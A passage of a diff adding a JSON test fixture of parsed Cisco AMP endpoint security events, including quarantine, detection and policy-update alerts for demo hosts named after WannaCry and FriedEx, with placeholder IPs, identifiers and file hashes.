Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419187537109058000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419187537109057560",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:49:08.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:23.854026933Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6583853374897127000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "@timestamp": "2021-01-14T11:41:12.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854028807Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T11:41:12.000Z",
+                "action": "Executed malware",
+                "id": "14945825043963",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296272
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "@timestamp": "2021-01-14T11:41:12.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854030779Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T11:41:12.000Z",
+                "action": "Multiple Infected Files",
+                "id": "14945825043964",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.ED01EBFBC9-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296258
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:28:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Exploit_Prevention_Audit"
+                ],
+                "hash": [
+                    "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Exploit_Prevention_Audit",
+                "hostname": "Demo_AMP_Exploit_Prevention_Audit"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854032652Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6533671599780921000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "d2:78:15:4a:f4:a2",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "d2:78:15:4a:f4:a2"
+                        ]
+                    },
+                    "detection_id": "6533671595485954049",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:28:45.000Z",
+            "file": {
+                "name": "pp32.exe",
+                "path": "\\\\?\\C:\\pp32.exe",
+                "hash": {
+                    "sha1": "bdb11107a33eaeded6a838eb2a0e6167637dbe9c",
+                    "sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79",
+                    "md5": "5df0c4ebca109779dc8afc745d612637"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Exploit_Prevention_Audit"
+                ],
+                "hash": [
+                    "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79",
+                    "5df0c4ebca109779dc8afc745d612637",
+                    "bdb11107a33eaeded6a838eb2a0e6167637dbe9c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_AMP_Exploit_Prevention_Audit",
+                "hostname": "Demo_AMP_Exploit_Prevention_Audit"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854034528Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6533671595485954000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.FCE5B6784D-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "d2:78:15:4a:f4:a2",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "d2:78:15:4a:f4:a2"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533671595485954049",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:38.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854036408Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419179222052372000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419179222052372503",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:38.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854038307Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419179222052372000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419179222052372503",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:37.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854040200Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419179217757405000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419179217757405206",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:26:37.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854042089Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
